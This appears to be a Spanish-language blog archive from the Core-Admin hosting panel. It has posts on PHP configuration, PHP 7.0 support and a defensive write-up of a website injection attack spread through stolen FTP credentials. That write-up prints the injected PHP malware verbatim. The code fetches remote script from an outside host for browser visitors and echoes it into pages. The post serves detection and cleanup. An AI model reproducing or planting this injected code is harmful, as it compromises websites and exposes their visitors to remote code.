Blog

Archive for PHP

KB 22092016-001 : Corrigiendo el error: The requested URL /cgi-bin/php-fastcgi-wrapper/index.php was not found on this server.

Síntomas

Si estás obteniendo el siguiente error cuando accede a un sitio web creado con el panel Core-Admin o algo similar:

The requested URL /cgi-bin/php-fastcgi-wrapper/index.php was not found on this server.

Entonces es posible que haya creado un sitio web con las configuraciones personalizadas que haya importado ajustes de motor php de otro sitio o simplemente el directorio sitio.com/bin se perdió.

Revisiones afectadas

Todas las revisiones pueden sufrir este problema. No es un fallo, sino una configuración personalizada defectuosa.

Antecedentes

El problema es causado porque de algún modo, core-admin no pudo crear todas las estructuras necesarias para el motor para que este sitio corra con un motor distinto.

Solución

Para resolver esto, siga los siguientes pasos:

  1. Deshabilite las configuraciones personalizadas y deje que Core-Admin controle la configuración apache2 del site.conf. Para ello, vaya a la herramienta de gestión de alojamientos, luego pinche en “Configuarciones personalizadas”, encuentre ahí el sitio afectado, copie en un documento temporal sus configuraciones personalizadas (para restaurarlas después) y deshabilite la configuarción personalizada.
  2. Después de eso, seleccione el motor php correcto que quiera dentro de la sección “Motores PHP”.
  3. Después de eso, active de nuevo las configuraciones personalizadas (si es necesario) y restaure los ajustes personalizados.

Posted in: Apache2, Core-Admin Web Edition, PHP

Leave a Comment (0) →

Actualizando el tamaño máximo de POST para un sitio web — php post_max_size — php upload_max_filesize

Configurando el tamaño máximo de POST (post_max_size y upload_max_filesize)

Core-Admin incluye a partir de la revisión 5110, el soporte para poder configurar fácilmente el tamaño de POST, también conocido como el “post_max_size” y el “upload_max_filesize”.

Para ello, hay que entrar como administrador a la plataforma Core-Admin, seleccionar un sitio web en concreto, y acceder a la pestaña “Opciones del sitio”:

Opciones del sitio web, Gestión de alojamientos de Core-Admin

Si la opción no está configurada, aparecerá como “sin configurar”. Ahora, tan solo tiene que seleccionarla pinchando sobre ella, a continuación configurar un valor en megabytes (MB) y darle a “Editar opción”. Con esto habremos acabado.

Posted in: Apache2, Core-Admin, Core-Admin Web Edition, PHP

Leave a Comment (0) →

Soporte de PHP 7.0 para Core-Admin Web Edition

PHP releaseA partir de la versión 1.0.46 (revisión 4644), ahora Core-Admin soporta PHP 7.0 para tus aplicaciones de alojamiento web, configurable a nivel de dominio (de manera que el resto de dominios pueden ejecutar con diferentes motores PHP). Este nuevo motor permite soportar la última versión de PHP, junto con el resto de revisiones, incluyendo las descatalogadas para aplicaciones antiguas (5.6, 5.4, 5.3, 5.2).

Compruebe nuestra edición Web para comprobar cómo funciona: http://www.core-admin.com/portal/get-it/web-edition

Posted in: Core-Admin Web Edition, PHP, Web hosting

Leave a Comment (0) →

Usando Core-Admin para defenderse del hacking web php+#

Tras una revisión de rutina ha encontrado que varias webs han sido actualizadas introduciendo un código como el siguiente o tal vez un cliente molesto cuya web está siendo bloqueada por el navegador por incluir código sospechoso:

<?php
#41f893#
error_reporting(0); ini_set('display_errors',0); $wp_wefl08872 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_wefl08872) &amp;&amp; !preg_match ('/bot/i', $wp_wefl08872))){
$wp_wefl0908872="http://"."http"."href".".com/href"."/?ip=".$_SERVER['REMOTE_ADDR']."&amp;referer=".urlencode($_SERVER['HTTP_HOST'])."&amp;ua=".urlencode($wp_wefl08872);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_wefl0908872);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_08872wefl = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_08872wefl,1,3) === 'scr' ){ echo $wp_08872wefl; }
#/41f893#
?>

Estos ataques no suponen un peligro para la máquina si está bien configurada, pero hacen que las webs afectadas ejecuten código remoto de chats o publicidad que hará que google chrome y otros navegadores bloqueen dichas páginas por ejecutar código sospechoso.

Conociendo un poco más este ataque

El problema de este ataque es que actualiza los ficheros originales introduciendo una modificación “quirúrgica” haciendo realmente difícil y molesto volver al estado original.

Una opción es la copia de seguridad, pero con las webs actuales que utilizan todo tipo de caches y ficheros de php-to-string, hacen que no sea sencillo. No es posible simplemente recuperar “encima”. Tiene que regresar a un estado consistente de la última copia. Esto implica eliminar la web actual y recuperar los ficheros de la última copia.

Tras esto no hay que olvidarse de resetear/bloquear todas las contraseñas  y cuentas FTP utilizadas durante el ataque.

Primera línea de defensa: saber cuándo ha sido el ataque

Core-Admin le proporciona este conocimiento según ocurre el ataque. Tras la modificación, el servicio de monitorización de cambios de Core-Admin le informará del “posible ataque Php hash” detectado con una indicación similar a la siguiente:

Core-Admin: detecting php hash attack

Tras recibir esta notificación, tan solo tiene que ejecutar el siguiente comando para detectar el total de ficheros modificados y las cuentas FTP comprometidas. El mismo comando le ayudará a realizar todo este trabajo automáticamente:

>> crad-find-and-fix-phphash-attack.pyc

Tras ejecutar este comando, que solo le informará, puede ejecutar el mismo con las siguientes opciones para que corrija los ficheros y actualice las cuentas FTP:

>> crad-find-and-fix-phphash-attack.pyc --clean --change-ftp-accounts

¿Cómo ha ocurrido el ataque?

Este ataque en concreto está conectado con una red de equipos que se dedican a realizar las modificaciones junto con un virus/troyano que infecta equipos con clientes FTP conocidos.  Las fases de desarrollo son las siguientes:

  1. Al utilizar clientes FTP conocidos que guardan las contraseñas en lugares predefinidos se inicia la primera parte.
  2. También hay sospechas que el uso de Wifis públicas o redes no protegidas permitiría acceder a esta información mientras se inicia la sesión FTP.
  3. Tras esto, si sus equipos quedan expuestos al virus/troyano que extrae esta información, este último enviará esta información de usuarios y contraseñas a la red de servidores de modificación.
  4. Con esta información, los servidores de modificación (así les llamamos) que finalmente atacan son capaces de entrar por FTP, descargar los ficheros, aplicar las modificaciones, y volver a subir los ficheros ya actualizados.

Notas importantes del ataque

Es importante entender que los servidores de modificación no realizarán el ataque nada más recibir las contraseñas. Esperarán a tener varias contraseñas para el mismo sistema y también retrasarán el ataque para desconectar la infección del equipo con el ataque.

De esta manera, esperan que el usuario habitual no conecte ambos sucesos lo que provoque el análisis de los equipos con antivirus/antitroyanos, cerrando así la fuga de información.

Por otra parte, también esperan a tener varias contraseñas para realizar un ataque más masivo de manera que la confusión del ataque o la magnitud del mismo haga que parte de la infección sobreviva.

¿Cómo puedo prevenirlo?

Hay varias acciones que puede realizar para evitar este tipo de ataques.

  1. Procure no guardar las contraseñas en su gestor FTP. Intente guardarlas en una aplicación de gestión de contraseñas que las guarde cifradas.
  2. Evite usar Wifis y conexiones compartidas (como la de los hoteles) para realizar modificaciones FTP.
  3. Si es posible, tras realizar las modificaciones FTP, pase a modo lectura o desactive la cuenta FTP desde el panel Core-Admin. De esta manera, aunque la contraseña sea conocida, no podrán hacer la modificación.

Posted in: Core-Admin, Core-Admin Web Edition, PHP, Seguridad

Leave a Comment (0) →